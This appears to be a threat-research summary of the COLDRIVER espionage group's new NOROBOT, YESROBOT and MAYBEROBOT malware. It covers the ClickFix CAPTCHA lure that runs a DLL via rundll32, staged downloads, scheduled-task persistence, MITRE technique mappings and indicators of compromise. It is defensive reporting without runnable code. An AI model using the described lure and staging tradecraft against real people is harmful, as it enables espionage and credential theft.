Threat Research

COLDPRIVER New Malware Toolset Expansion

Securonix
COLDPRIVER New Malware Toolset Expansion

Researchers observed the Russian APT COLDRIVER rapidly replace LOSTKEYS with new malware families NOROBOT, YESROBOT, and MAYBEROBOT to target high-value individuals in NGOs, policy advisory roles, and dissidents. The group refined delivery (ClickFix CAPTCHA lure with iamnotarobot.dll executed via rundll32), rotated infrastructure, and shifted from Python-based to PowerShell-based backdoors to improve flexibility and evade detection. #COLDRIVER #NOROBOT

Keypoints

  • COLDRIVER (aka UNC4057/Star Blizzard/Callisto) quickly transitioned from LOSTKEYS to NOROBOT, YESROBOT, and MAYBEROBOT within days of LOSTKEYS disclosure.
  • Initial infection uses a refined COLDCOPY “ClickFix” lure posing as CAPTCHA with text like “humanCheck” and a malicious DLL named iamnotarobot.dll executed via rundll32.
  • NOROBOT acts as the downloader, fetching stages (e.g., self-extracting RAR with Python 3.8) and storing cryptographic keys in the registry with persistence via scheduled tasks.
  • YESROBOT is a Python 3.8-based backdoor that encoded system info in the HTTPS User-Agent but was limited by Python command constraints and thus short-lived.
  • MAYBEROBOT is a PowerShell-based backdoor with an extensible protocol supporting file download/execute, cmd execution, and PowerShell block execution, improving operational flexibility.
  • COLDRIVER continuously refines NOROBOT (infrastructure rotation, filename changes, cryptographic key splitting) while maintaining MAYBEROBOT stability, balancing flexibility and operator complexity.
  • Targets include high-profile Western-aligned individuals and organizations—NGOs, think tanks, journalists, former intelligence/military officials—primarily for espionage and credential theft.

MITRE Techniques

  • [T1218] Signed Binary Proxy Execution – rundll32.exe used to execute the malicious DLL iamnotarobot.dll via the ClickFix lure (“…iamnotarobot.dll… executed through rundll32”).
  • [T1204] User Execution – Victim social engineering with a ClickFix CAPTCHA-style lure prompts users to run a malicious file (“…posing as a CAPTCHA verification to trick users into executing a malicious DLL…”).
  • [T1105] Ingress Tool Transfer – NOROBOT downloads subsequent stages (self-extracting RAR, Python runtime, scripts) from hardcoded C2 (“…retrieving subsequent stages from a hardcoded command-and-control (C2) server”).
  • [T1547] Boot or Logon Autostart Execution (Scheduled Task) – Persistence established via scheduled tasks (“…established persistence via scheduled tasks”).
  • [T1573] Encrypted Channel – YESROBOT communicates to C2 over HTTPS and encodes system information in the User-Agent (“…communicates via HTTPS to a C2 server, encoding system information in the User-Agent header”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – MAYBEROBOT is a PowerShell-based backdoor executing PowerShell blocks and commands (“…MAYBEROBOT, a PowerShell-based backdoor… supports … executing PowerShell blocks”).
  • [T1027] Obfuscated Files or Information – NOROBOT and associated stages use complex cryptography and key-splitting to hinder analysis (“…reintroducing complex cryptographic key splitting to hinder analysis”).

Indicators of Compromise

  • [File Hash ] samples associated with COLDRIVER activity – bce2a7165ceead4e3601e311c72743e0059ec2cd734ce7acf5cc9f7d8795ba0f, 2e74f6bd9bf73131d3213399ed2f669ec5f75392de69edf8ce8196cd70eb6aee (and 6 more hashes).
  • [File Name ] delivery and payload filenames – iamnotarobot.dll (malicious DLL executed via rundll32), libsystemhealthcheck.py (component containing AES key material).
  • [Tools/Commands ] download and execution mechanisms – bitsadmin used to retrieve files (e.g., downloading libsystemhealthcheck.py and libcryptopydatasize.py); scheduled tasks used for persistence.

Read more: https://blog.polyswarm.io/coldriver-updates-its-arsenal